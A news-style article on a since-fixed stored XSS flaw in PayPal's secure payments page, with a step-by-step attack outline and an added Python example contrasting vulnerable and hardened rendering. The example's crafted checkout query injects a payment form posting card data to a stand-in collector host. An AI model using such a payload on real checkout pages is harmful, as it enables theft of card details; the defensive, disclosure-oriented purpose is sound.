As its name suggests, the domain is used to buy products from any online shopping website by making secure online payments. It allows buyers to pay with their payment cards or PayPal accounts, so the merchant never has to capture or store sensitive payment information. However, an attacker could set up a disguised online store, or compromise a legitimate shopping website, to fool users into providing their personal and financial details. According to Hegazy’s blog post, the vulnerability was found only on the “https://securepayments.paypal.com” domain, which is used to process commercial transactions. Exploiting this flaw, an attacker would have been able to inject his own payment forms into the page’s HTML, which would have let him intercept the user’s private financial information in clear text. Since PayPal routinely asks users to enter credit card numbers, card expiration dates, CSC codes, and even names, users would have found it very difficult to notice anything unusual when asked for these details.

How the Stored XSS Attack Works

In his blog post, Hegazy describes a step-by-step process that explains the attack in detail.

1. The attacker sets up a rogue shopping site or hijacks a legitimate one.
2. The “CheckOut” button on that site is modified to point to a URL designed to exploit the XSS vulnerability.
3. Whenever PayPal users browse the malformed shopping website and click the “CheckOut” button to pay with their PayPal account, they are redirected to the Secure Payments page.
4. That page actually displays a phishing page, where the victims are asked to enter their payment card information to complete the purchase.
5. On clicking the Submit Payment button, instead of paying the product price (say $100), the PayPal user pays the attacker an amount of the attacker’s choice.
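The following is an added example, not code from Hegazy’s write-up or from PayPal: a constructed stand-in for a hosted payments page that renders merchant-supplied checkout parameters (the parameter names `item` and `amount` are assumptions), shown in its vulnerable and hardened forms together with a one-form check a reviewer can run over a rendered page.

```python
import html
import re
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for a hosted "secure payments" page that renders merchant-supplied
# checkout parameters. Not PayPal's code; the parameter names are assumptions.

TEMPLATE = """<html><body>
<h1>Pay ${amount} for {item}</h1>
<form action="/pay" method="post">
  <input name="card"><button>Submit Payment</button>
</form>
</body></html>"""

def is_valid_amount(amount: str) -> bool:
    """Allow only a plain decimal amount, so the price field cannot carry markup."""
    return re.fullmatch(r"\d{1,7}(\.\d{2})?", amount) is not None

def render_vulnerable(query: str) -> str:
    """Interpolates the merchant's item name verbatim: a hostile merchant injects HTML."""
    params = parse_qs(query)
    item = params.get("item", [""])[0]
    amount = params.get("amount", [""])[0]
    return TEMPLATE.format(amount=amount, item=item)

def render_hardened(query: str) -> str:
    """HTML-escapes the item name and rejects a non-numeric amount before rendering."""
    params = parse_qs(query)
    item = html.escape(params.get("item", [""])[0], quote=True)
    amount = params.get("amount", [""])[0]
    if not is_valid_amount(amount):
        raise ValueError("amount must be a decimal number")
    return TEMPLATE.format(amount=amount, item=item)

# Response header that stops any injected <form> from posting anywhere but this origin,
# even if an escaping gap remains somewhere on the page.
HARDENED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; form-action 'self'",
}

def count_forms(page: str) -> int:
    """Review check over a rendered page: the legitimate page contains exactly one form."""
    return page.lower().count("<form")

# Constructed checkout query, as a crafted "CheckOut" link would carry it: the item name
# contains a second payment form whose action points at a third-party host.
CRAFTED_QUERY = urlencode({
    "item": '<form action="https://collector.example/"><input name="card"></form>',
    "amount": "100",
})
```

Running `count_forms` over the two renders gives 2 for the vulnerable page and 1 for the hardened one, which is the kind of assertion a regression test for this class of bug should make.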

Video Demonstration

The researcher has also provided a proof-of-concept (PoC) video, which you can watch here.

Hegazy disclosed the security vulnerability to the PayPal security team on June 19th; the team confirmed it and fixed it on August 25th, two days ago. Under the PayPal bug bounty program, Mr. Hegazy was rewarded $750 (€665) for his discovery, which is the company’s maximum bug bounty payout for XSS vulnerabilities.